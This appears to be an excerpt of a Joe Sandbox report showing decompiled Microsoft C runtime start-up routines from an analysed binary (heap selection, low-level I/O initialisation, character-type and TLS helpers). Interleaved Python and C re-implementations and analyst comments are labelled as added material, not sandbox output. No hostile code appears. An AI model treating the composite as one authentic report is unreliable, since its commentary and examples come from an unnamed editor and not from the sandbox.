										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);	// 0x00418b99
									}	// 0x00418b99
								}	// 0x00418b8f
							}	// 0x00418b76
						}	// 0x00418b3c
					} else {	// 0x00418ae0
						_t45 = _a24;	// 0x00418ae0
						if(_t45 == 0) {	// 0x00418ae5
							_t45 =  *0x42353c;	// 0x00418ae7  default locale (LCID) global; observed value 0x0
						}	// 0x00418ae7
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);	// 0x00418af9
					}	// 0x00418af9
				} else {	// 0x00418a9d
					_push( &_v32);	// 0x00418aa0
					_t61 = 1;	// 0x00418aa3
					if(GetStringTypeW(_t61, 0x41bdf8, _t61, ??) == 0) {	// 0x00418ab3  probe: CT_CTYPE1 on a one-character string
						if(GetStringTypeA(0, _t61, 0x41bdf4, _t61,  &_v32) == 0) {	// 0x00418acd
							L18:	// 0x00418ba1
							_t32 = 0;	// 0x00418ba1  failure
						} else {	// 0x00418ad3
							_t31 = 2;	// 0x00418ad5  only the ANSI API works
							goto L5;
						}	// 0x00418ad5
					} else {	// 0x00418ab5
						_t31 = _t61;	// 0x00418ab5  Unicode API works
						L5:	// 0x00418ad6
						 *0x423558 = _t31;	// 0x00418ad6  remember the choice for later calls
						goto L6;
					}	// 0x00418ad6
				}	// 0x00418ab3
				 *[fs:0x0] = _v20;	// 0x00418ba9  SEH frame teardown
				return _t32;	// 0x00418bb4
			}

                              APIs
                              • GetStringTypeW.KERNEL32(00000001,0041BDF8,00000001,?,747170F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AAB
                              • GetStringTypeA.KERNEL32(00000000,00000001,0041BDF4,00000001,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AC5
                              • GetStringTypeA.KERNEL32(?,?,?,?,004186BE,747170F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AF9
                              • MultiByteToWideChar.KERNEL32(?,004256C5,?,?,00000000,00000000,747170F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418B31
                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,004186BE,?), ref: 00418B87
                              • GetStringTypeW.KERNEL32(?,?,00000000,004186BE,?,?,?,?,?,?,004186BE,?), ref: 00418B99
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: StringType$ByteCharMultiWide
                              • String ID:
                              • API String ID: 3852931651-0
                              • Opcode ID: 3d6b6e16685600d833415d128f0286c3ce565afe4e7b6c7271f7b5a09b5fc09b
                              • Instruction ID: e288f18e772608454304c6360a88be647065f5ca3cb36798b5d5ed4d75a3f5a0
                              • Opcode Fuzzy Hash: 3d6b6e16685600d833415d128f0286c3ce565afe4e7b6c7271f7b5a09b5fc09b
                              • Instruction Fuzzy Hash: B0416DB2600219BFCF208F94DC86EEF7F79EB08794F10442AF915D2250D7389991CBA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 91%
			// Analyst note: this routine matches the statically linked Microsoft C runtime routine __heap_select
			// (return value 1 = __SYSTEM_HEAP, 2 = __V5_HEAP, 3 = __V6_HEAP). It is runtime start-up code, not
			// sample-specific logic. Helper roles in the comments are inferred from call signatures; the helper
			// bodies are not shown here. Trailing hex comments are the instruction addresses.
			E004158B0(void* __ecx, void* __eflags) {
				char _v8;
				struct _OSVERSIONINFOA _v156;
				char _v416;
				char _v4656;
				void* _t24;
				CHAR* _t32;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;
				char _t36;
				char _t38;
				void* _t40;
				char* _t44;
				char* _t45;
				char* _t50;

				E00413CC0(0x122c, __ecx);	// 0x004158b8  stack probe for the 0x122c-byte frame
				_v156.dwOSVersionInfoSize = 0x94;	// 0x004158c5
				if(GetVersionExA( &_v156) != 0 && _v156.dwPlatformId == 2 && _v156.dwMajorVersion >= 5) {	// 0x004158d7  VER_PLATFORM_WIN32_NT, Windows 2000 or later
					_t40 = 1;	// 0x004158ed  system heap
					return _t40;
				}	// 0x004158ed
				if(GetEnvironmentVariableA("__MSVCRT_HEAP_SELECT",  &_v4656, 0x1090) == 0) {	// 0x0041590c
					L28:	// 0x004159e2  default path: the helper result selects 2 or 3
					_t24 = E00415883( &_v8);	// 0x004159e6
					asm("sbb eax, eax");	// 0x004159f0
					return _t24 + 3;
				}	// 0x004159f2
				_t44 =  &_v4656;	// 0x00415914
				if(_v4656 != 0) {	// 0x00415920
					do {	// 0x00415922  uppercase the variable in place ('a'..'z' minus 0x20)
						_t38 =  *_t44;	// 0x00415922
						if(_t38 >= 0x61 && _t38 <= 0x7a) {	// 0x00415926
							 *_t44 = _t38 - 0x20;	// 0x0041592e
						}	// 0x0041592e
						_t44 = _t44 + 1;	// 0x00415930
					} while ( *_t44 != 0);	// 0x00415931
				}	// 0x00415922
				if(E00417D60("__GLOBAL_HEAP_SELECTED",  &_v4656, 0x16) != 0) {	// 0x0041594d  strncmp over 22 characters; nonzero = no global selector
					GetModuleFileNameA(0,  &_v416, 0x104);	// 0x00415964
					_t45 =  &_v416;	// 0x00415970
					if(_v416 != 0) {	// 0x00415976
						do {	// 0x00415978  uppercase the module path the same way
							_t36 =  *_t45;	// 0x00415978
							if(_t36 >= 0x61 && _t36 <= 0x7a) {	// 0x0041597c
								 *_t45 = _t36 - 0x20;	// 0x00415984
							}	// 0x00415984
							_t45 = _t45 + 1;	// 0x00415986
						} while ( *_t45 != 0);	// 0x00415987
					}	// 0x00415978
					_t32 = E00417CE0( &_v4656,  &_v416);	// 0x00415999  strstr: locate this module's own entry in the variable
				} else {	// 0x0041594f
					_t32 =  &_v4656;	// 0x0041594f
				}	// 0x0041594f
				if(_t32 == 0) {	// 0x004159a2
					goto L28;
				}
				_t33 = E00417C20(_t32, 0x2c);	// 0x004159a7  strchr(',')
				if(_t33 == 0) {	// 0x004159b0
					goto L28;
				}
				_t34 = _t33 + 1;	// 0x004159b2
				_t50 = _t34;	// 0x004159b3
				if( *_t34 != 0) {	// 0x004159b7
					do {	// 0x004159b9  terminate the value at the first ';'
						if( *_t50 != 0x3b) {	// 0x004159bc
							_t50 = _t50 + 1;	// 0x004159c2
						} else {	// 0x004159be
							 *_t50 = 0;	// 0x004159be
						}	// 0x004159be
					} while ( *_t50 != 0);	// 0x004159c3
				}	// 0x004159b9
				_t35 = E004179F0(_t34, 0, 0xa);	// 0x004159cb  strtol(value, NULL, 10)
				if(_t35 != 2 && _t35 != 3 && _t35 != 1) {	// 0x004159d6  only 1, 2 or 3 are accepted
					goto L28;
				}
				return _t35;	// 0x004159f7
			}
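The selection logic of E004158B0 above, re-expressed in Python as an added worked example. This is not code from the report or from the sample: it models the `__MSVCRT_HEAP_SELECT` handling shown in the decompile (ASCII-only uppercasing, the 22-character `__GLOBAL_HEAP_SELECTED` prefix test, the fall-back search for the uppercased module path, the `,` and `;` delimiters, and the 1/2/3 whitelist) and extends it with the cases the decompile rejects. The GetVersionExA shortcut is modelled as a parameter, and the L28 fall-back (which the page shows only as a helper call returning 2 or 3) is represented by a sentinel; both are assumptions of the example.

```python
"""Emulation of the heap-selection decision decompiled as E004158B0."""
import re

# Values the decompiled routine accepts from the variable.
SYSTEM_HEAP, V5_HEAP, V6_HEAP = 1, 2, 3
# Sentinel for the L28 fall-back path, which calls a helper (not shown) and returns 2 or 3
# at run time; the example does not model that helper.
FALLBACK = 0

GLOBAL_TAG = "__GLOBAL_HEAP_SELECTED"   # compared over 0x16 = 22 characters


def c_upper(s: str) -> str:
    """Fold only 'a'..'z' (0x61..0x7a) by subtracting 0x20, like the two in-place loops."""
    return "".join(chr(ord(c) - 0x20) if "a" <= c <= "z" else c for c in s)


def strtol10(s: str) -> int:
    """strtol(s, NULL, 10): optional leading whitespace and sign, then digits; 0 if none."""
    m = re.match(r"\s*([+-]?\d+)", s)
    return int(m.group(1)) if m else 0


def heap_select(env_value, module_path, os_version=None):
    """Return 1, 2 or 3 as E004158B0 would, or FALLBACK for its L28 path.

    env_value   -- value of __MSVCRT_HEAP_SELECT, or None if the variable is unset
    module_path -- what GetModuleFileNameA would return for the process
    os_version  -- (dwPlatformId, dwMajorVersion) from GetVersionExA, or None
    """
    # VER_PLATFORM_WIN32_NT (2) with major version >= 5: system heap, nothing else is consulted
    if os_version is not None and os_version[0] == 2 and os_version[1] >= 5:
        return SYSTEM_HEAP
    if env_value is None:                      # GetEnvironmentVariableA returned 0
        return FALLBACK
    value = c_upper(env_value)
    if value[:22] == GLOBAL_TAG:               # strncmp(..., 22) == 0: selector applies to every module
        start = 0
    else:                                      # otherwise look for this module's own entry (strstr)
        start = value.find(c_upper(module_path))
        if start < 0:
            return FALLBACK
    comma = value.find(",", start)             # strchr(',') from the match onwards
    if comma < 0:
        return FALLBACK
    field = value[comma + 1:]
    semi = field.find(";")                     # the ';' loop writes a NUL at the first ';'
    if semi >= 0:
        field = field[:semi]
    n = strtol10(field)
    return n if n in (SYSTEM_HEAP, V5_HEAP, V6_HEAP) else FALLBACK
```

The per-module form is `<uppercased full path>,<n>;` and the search is a plain substring match, so an entry for another executable whose path contains this one's would also match; the routine only reads the first `,` after the match and stops at the first `;`, which the example reproduces.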

                              APIs
                              • GetVersionExA.KERNEL32 ref: 004158CF
                              • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00415904
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00415964
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: EnvironmentFileModuleNameVariableVersion
                              • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                              • API String ID: 1385375860-4131005785
                              • Opcode ID: a0a65974b78899c378749041d22a9f94542c4ef0915f209cf1eaea54d79fba9d
                              • Instruction ID: 007b09a40ac423c1d447adb87a92c2e34be193f5817f586218815b66d4303cb2
                              • Opcode Fuzzy Hash: a0a65974b78899c378749041d22a9f94542c4ef0915f209cf1eaea54d79fba9d
                              • Instruction Fuzzy Hash: 403177F1961648EDEF3196709C82BDF3B78DB46324F2400DBD185D6242E6388EC68B1B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 99%
			// Analyst note: this routine matches the statically linked Microsoft C runtime start-up routine _ioinit
			// (builds the __pioinfo low-level file table, takes over handles passed by the parent through
			// STARTUPINFO.lpReserved2, then attaches the three standard handles). It is runtime start-up code,
			// not sample-specific logic. Helper roles in the comments are inferred from call signatures.
			E00417641() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = E00413E65(0x480);	// heap allocation: 32 entries of 36 bytes for the first ioinfo block
				if(_t89 == 0) {
					E00414C0C(0x1b);	// fatal runtime error 27 (R6027: not enough space for lowio initialization)
				}
				 *0x425900 = _t89;	// __pioinfo[0]
				 *0x425a00 = 0x20;	// _nhandle = 32
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {	// initialise every entry of the block
					_t89[1] = _t89[1] & 0x00000000;	// clear the osfile / pipech bytes
					 *_t89 =  *_t89 | 0xffffffff;	// osfhnd = INVALID_HANDLE_VALUE
					_t89[2] = _t89[2] & 0x00000000;	// lockinitflag = 0
					_t89[1] = 0xa;	// pipech = 0x0a ('\n')
					_t70 =  *0x425900; // 0x520630
					_t89 =  &(_t89[9]);	// next 36-byte entry
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {	// no inherited handle table from the parent
					L25:
					_t72 = 0;
					__eflags = 0;
					do {	// entries 0..2: stdin, stdout, stderr
						_t75 =  *0x425900; // 0x520630
						_t50 = _t72 + _t72 * 8;	// entry stride: 9 dwords = 36 bytes
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {	// already filled from lpReserved2: just mark it text mode
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;	// FTEXT
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;	// FOPEN | FTEXT
						if(_t72 != 0) {	// STD_INPUT_HANDLE (-10), STD_OUTPUT_HANDLE (-11) or STD_ERROR_HANDLE (-12) by index
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;	// FDEV: character device, or no usable handle
						} else {
							_t57 = GetFileType(_t87);
							__eflags = _t57;
							if(_t57 == 0) {	// FILE_TYPE_UNKNOWN
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;	// osfhnd = the standard handle
							__eflags = _t58 - 2;
							if(_t58 != 2) {	// not FILE_TYPE_CHAR
								__eflags = _t58 - 3;
								if(_t58 == 3) {	// FILE_TYPE_PIPE
									_t90[1] = _t90[1] | 0x00000008;	// FPIPE
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x425a00);
				}
				_t59 = _v76.lpReserved2;	// inherited table: DWORD count, then count osfile bytes, then count HANDLEs
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;	// count
				_t73 = _t59 + 4;	// osfile byte array
				_v8 = _t73 + _t88;	// the handle array follows the osfile bytes
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {	// cap at 2048 entries
					_t88 = 0x800;
				}
				__eflags =  *0x425a00 - _t88; // 0x20
				if(__eflags >= 0) {	// the entries already allocated suffice
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
                              						goto L25;
                              					} else {
                              						goto L19;
                              					}
                              					do {
                              						L19:
                              						_t76 =  *_v8;
                              						__eflags = _t76 - 0xffffffff;
                              						if(_t76 == 0xffffffff) {
                              							goto L24;
                              						}
                              						_t63 =  *_t73;
                              						__eflags = _t63 & 0x00000001;
                              						if((_t63 & 0x00000001) == 0) {
                              							goto L24;
                              						}
                              						__eflags = _t63 & 0x00000008;
                              						if((_t63 & 0x00000008) != 0) {
                              							L23:
                              							_t65 = _t91 & 0x0000001f;
                              							__eflags = _t65;
                              							_t67 =  &(0x425900[_t91 >> 5][_t65 + _t65 * 8]);
                              							 *_t67 =  *_v8;
                              							_t67[1] =  *_t73;
                              							goto L24;
                              						}
                              						_t68 = GetFileType(_t76);
                              						__eflags = _t68;
                              						if(_t68 == 0) {
                              							goto L24;
                              						}
                              						goto L23;
                              						L24:
                              						_v8 =  &(_v8[1]);
                              						_t91 = _t91 + 1;
                              						_t73 = _t73 + 1;
                              						__eflags = _t91 - _t88;
                              					} while (_t91 < _t88);
                              					goto L25;
                              				} else {
                              					_t92 = 0x425904;
                              					while(1) {
                              						_t69 = E00413E65(0x480);
                              						__eflags = _t69;
                              						if(_t69 == 0) {
                              							break;
                              						}
                              						 *0x425a00 =  *0x425a00 + 0x20;
                              						__eflags =  *0x425a00;
                              						 *_t92 = _t69;
                              						_t13 = _t69 + 0x480; // 0x480
                              						_t84 = _t13;
                              						while(1) {
                              							__eflags = _t69 - _t84;
                              							if(_t69 >= _t84) {
                              								break;
                              							}
                              							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
                              							 *_t69 =  *_t69 | 0xffffffff;
                              							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
                              							 *((char*)(_t69 + 5)) = 0xa;
                              							_t69 = _t69 + 0x24;
                              							_t84 =  *_t92 + 0x480;
                              						}
                              						_t92 =  &(_t92[1]);
                              						__eflags =  *0x425a00 - _t88; // 0x20
                              						if(__eflags < 0) {
                              							continue;
                              						}
                              						goto L18;
                              					}
                              					_t88 =  *0x425a00; // 0x20
                              					goto L18;
                              				}
                              			}

Instruction addresses for the C-Code above (a per-line address column that extraction spilled into a list): 0x00417654 to 0x004177fc.

                              APIs
                              • GetStartupInfoA.KERNEL32(?), ref: 0041769F
                              • GetFileType.KERNEL32(?,?,00000000), ref: 0041774A
                              • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004177AD
                              • GetFileType.KERNEL32(00000000,?,00000000), ref: 004177BB
                              • SetHandleCount.KERNEL32 ref: 004177F2
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: FileHandleType$CountInfoStartup
                              • String ID:
                              • API String ID: 1710529072-0
                              • Opcode ID: 8c6679148f64bb77278d6d77b9368511d7cfe70b0cd8573ea2dfe0e7b80ae48f
                              • Instruction ID: 1521dec5194d53324a877df202082dadc936f581ec6971422c000dc394b087b4
                              • Opcode Fuzzy Hash: 8c6679148f64bb77278d6d77b9368511d7cfe70b0cd8573ea2dfe0e7b80ae48f
                              • Instruction Fuzzy Hash: 39510B716086458FC7208B28D8847A67BB0FB11378F65866ED5B2C72E0D738A886C759
                              Uniqueness

                              Uniqueness Score: -1.00%
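The routine above is the MSVC CRT's low-level I/O initialisation (_ioinit), not sample-specific logic: it reads the file handles a parent process passed in STARTUPINFO.lpReserved2 (a count, one flag byte per entry, then one 32-bit handle per entry), copies the usable ones into the CRT handle table in 0x20-entry blocks capped at 0x800, and then fills fds 0..2 from GetStdHandle. An analyst triaging this report can skip it. Because the report shows the decompilation without explaining the layout, the following is an added example (ours, not code from the sample, the CRT or Joe Sandbox) that re-implements both passes in portable C on a constructed lpReserved2 buffer. GetStdHandle and GetFileType are replaced by injected callbacks so it runs offline; the flag bits 0x01/0x08/0x40/0x80, the 0x800 cap, the 0xffffffff sentinel and the -10/-11/-12 std-handle ids come from the decompilation, while the names FOPEN/FPIPE/FDEV/FTEXT, ioinfo32, every function name and the fake handle values are our assumptions.

```c
/* Added example (not from the sample or the report): the two passes of the
 * decompiled routine at 0x00417654 (MSVC CRT _ioinit) on a constructed
 * lpReserved2 buffer. GetStdHandle/GetFileType are injected callbacks so it
 * runs on any platform; all names and handle values here are assumptions. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define FOPEN  0x01   /* flag bits tested by the decompiled loops (CRT ioinfo.osfile) */
#define FPIPE  0x08
#define FDEV   0x40
#define FTEXT  0x80
#define MAX_INHERITED    0x800        /* if(_t88 >= 0x800) _t88 = 0x800 */
#define INVALID_HANDLE32 0xFFFFFFFFu  /* INVALID_HANDLE_VALUE in a 32-bit process */
enum { FT_UNKNOWN = 0, FT_DISK = 1, FT_CHAR = 2, FT_PIPE = 3 };  /* GetFileType results */

typedef struct { uint32_t osfhnd; uint8_t osfile; } ioinfo32;   /* *_t67 and _t67[1] */
typedef uint32_t (*get_std_handle_fn)(int32_t which);
typedef uint32_t (*get_file_type_fn)(uint32_t handle);

void ioinfo_reset(ioinfo32 *t, size_t n) {          /* block initialiser: handle -1, flags 0 */
    for (size_t i = 0; i < n; i++) { t[i].osfhnd = INVALID_HANDLE32; t[i].osfile = 0; }
}

/* Pass 1. lpReserved2 = { uint32 count; uint8 flags[count]; uint32 handles[count] }.
 * Returns how many table slots were filled; 0 for a missing or truncated buffer. */
size_t ioinit_inherit(const uint8_t *res2, size_t res2_len, ioinfo32 *table,
                      size_t table_len, get_file_type_fn file_type) {
    uint32_t count;
    if (res2 == NULL || res2_len < 4) return 0;
    memcpy(&count, res2, 4);
    if (count > MAX_INHERITED) count = MAX_INHERITED;
    if (count > table_len) count = (uint32_t)table_len;       /* the CRT grows its table instead */
    if (res2_len < 4 + (size_t)count * 5) return 0;            /* a parent can hand us a short blob */
    const uint8_t *flags = res2 + 4, *handles = flags + count;
    size_t filled = 0;
    for (uint32_t i = 0; i < count; i++) {
        uint32_t h; uint8_t f = flags[i];
        memcpy(&h, handles + (size_t)i * 4, 4);
        if (h == INVALID_HANDLE32) continue;                   /* *_v8 == 0xffffffff */
        if (!(f & FOPEN)) continue;                            /* (_t63 & 1) == 0 */
        if (!(f & FPIPE) && file_type(h) == FT_UNKNOWN) continue;  /* GetFileType failed */
        table[i].osfhnd = h; table[i].osfile = f; filled++;
    }
    return filled;
}

/* Pass 2. Fill fds 0..2 that are still empty from the process std handles (table >= 3 slots). */
void ioinit_std(ioinfo32 *table, get_std_handle_fn std_handle, get_file_type_fn file_type) {
    for (int fd = 0; fd < 3; fd++) {
        ioinfo32 *e = &table[fd];
        if (e->osfhnd != INVALID_HANDLE32) { e->osfile |= FTEXT; continue; }
        e->osfile = FOPEN | FTEXT;                             /* _t90[1] = 0x81 */
        uint32_t h = std_handle(-10 - fd);                     /* STD_INPUT/OUTPUT/ERROR_HANDLE */
        uint32_t t = (h == INVALID_HANDLE32) ? FT_UNKNOWN : file_type(h);
        if (t == FT_UNKNOWN) { e->osfile |= FDEV; continue; }  /* L33: device flag, no handle */
        e->osfhnd = h;
        if (t == FT_CHAR) e->osfile |= FDEV; else if (t == FT_PIPE) e->osfile |= FPIPE;
    }
}

/* Builds a lpReserved2 blob; returns its length or 0 if out is too small. */
size_t build_reserved2(uint8_t *out, size_t out_len, const uint8_t *flags,
                       const uint32_t *handles, uint32_t n) {
    size_t need = 4 + (size_t)n * 5;
    if (out_len < need) return 0;
    memcpy(out, &n, 4); memcpy(out + 4, flags, n); memcpy(out + 4 + n, handles, (size_t)n * 4);
    return need;
}

/* Constructed test doubles standing in for Win32 (fake handle values, not real ones). */
uint32_t fake_file_type(uint32_t h) {
    if (h == 0xBAD) return FT_UNKNOWN;
    if (h == 0x11)  return FT_CHAR;
    return h >= 0x300 ? FT_PIPE : FT_DISK;
}
uint32_t fake_std_handle(int32_t which) {
    return which == -10 ? 0x10u : which == -11 ? 0x11u : INVALID_HANDLE32;  /* no stderr */
}

int main(void) {
    uint8_t flags[5] = { FOPEN | FTEXT, FOPEN, 0, FOPEN | FPIPE, FOPEN };  /* constructed */
    uint32_t handles[5] = { 0x100, INVALID_HANDLE32, 0x200, 0x300, 0xBAD };
    uint8_t buf[64]; ioinfo32 table[8];
    ioinfo_reset(table, 8);
    size_t len = build_reserved2(buf, sizeof buf, flags, handles, 5);
    size_t got = ioinit_inherit(buf, len, table, 8, fake_file_type);
    ioinit_std(table, fake_std_handle, fake_file_type);
    printf("inherited %zu of 5 entries\n", got);
    for (int i = 0; i < 5; i++)
        printf("fd %d: handle 0x%08x osfile 0x%02x\n", i, (unsigned)table[i].osfhnd, table[i].osfile);
    return 0;
}
```

Two points worth noting when reading the decompilation against this: an entry is only imported when its flag byte has FOPEN set and either FPIPE is set or GetFileType succeeds, so a parent can never inject a handle that the child cannot type; and fds 0..2 that remain empty after pass 1 are marked FDEV without a handle, which is why console-less samples still have "open" std fds.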

                              C-Code - Quality: 83%
                              			E00403AA7(signed int __ecx) {
                              				short _v6;
                              				char _v12;
                              				short _t12;
                              				short _t27;
                              				int _t29;
                              				void* _t30;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_v6 = __ecx;
                              				if(__ecx != 0) {
                              					_t27 = CharUpperW(__ecx & 0x0000ffff);
                              					if(_t27 != 0 || GetLastError() != 0x78) {
                              						_t12 = _t27;
                              					} else {
                              						_t29 = WideCharToMultiByte(0, 0,  &_v6, 1,  &_v12, 4, 0, 0);
                              						if(_t29 != 0 && _t29 <= 4) {
                              							 *((char*)(_t30 + _t29 - 8)) = 0;
                              							CharUpperA( &_v12);
                              							MultiByteToWideChar(0, 0,  &_v12, _t29,  &_v6, 1);
                              						}
                              						_t12 = _v6;
                              					}
                              				} else {
                              					_t12 = 0;
                              				}
                              				return _t12;
                              			}


Instruction addresses for the C-Code above (a per-line address column that extraction spilled into a list): 0x00403aaa to 0x00403b27.

                              APIs
                              • CharUpperW.USER32(00000000,00000000,?,00000000,00000000,?,00403B6F), ref: 00403AC2
                              • GetLastError.KERNEL32(?,00000000,00000000,?,00403B6F), ref: 00403ACE
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000004,00000000,00000000,?,00000000,00000000,?,00403B6F), ref: 00403AE9
                              • CharUpperA.USER32(?,?,00000000,00000000,?,00403B6F), ref: 00403B02
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000001,?,00000000,00000000,?,00403B6F), ref: 00403B15
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: Char$ByteMultiUpperWide$ErrorLast
                              • String ID:
                              • API String ID: 3939315453-0
                              • Opcode ID: 209c94fe8e33f847f2405d3a9712247a1b8bb9216b5908a8917fe0bd7a80c077
                              • Instruction ID: 0842cb939f6927aecb542cd9758d214692c03acffe84293a02396fd76ee0080f
                              • Opcode Fuzzy Hash: 209c94fe8e33f847f2405d3a9712247a1b8bb9216b5908a8917fe0bd7a80c077
                              • Instruction Fuzzy Hash: B30144B65001197ADB20ABE49CC9DEBBA7CDB08259F414572F942A3281E3756E4487B8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00415523() {
                              				void _t10;
                              				long _t15;
                              				void* _t16;
                              
                              				_t15 = GetLastError();
                              				_t16 = TlsGetValue( *0x420740);
                              				if(_t16 == 0) {
                              					_t16 = E00416EFC(1, 0x74);
                              					if(_t16 == 0 || TlsSetValue( *0x420740, _t16) == 0) {
                              						E00414C0C(0x10);
                              					} else {
                              						E00415510(_t16);
                              						_t10 = GetCurrentThreadId();
                              						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
                              						 *_t16 = _t10;
                              					}
                              				}
                              				SetLastError(_t15);
                              				return _t16;
                              			}


Instruction addresses for the C-Code above (a per-line address column that extraction spilled into a list): 0x00415531 to 0x00415589.

                              APIs
                              • GetLastError.KERNEL32(00000103,7FFFFFFF,00416EEF,00417BBE,00000000,?,?,00000000,00000001), ref: 00415525
                              • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 00415533
                              • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0041557F
                                • Part of subcall function 00416EFC: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00416FF2
                              • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 00415557
                              • GetCurrentThreadId.KERNEL32 ref: 00415568
                              Memory Dump Source
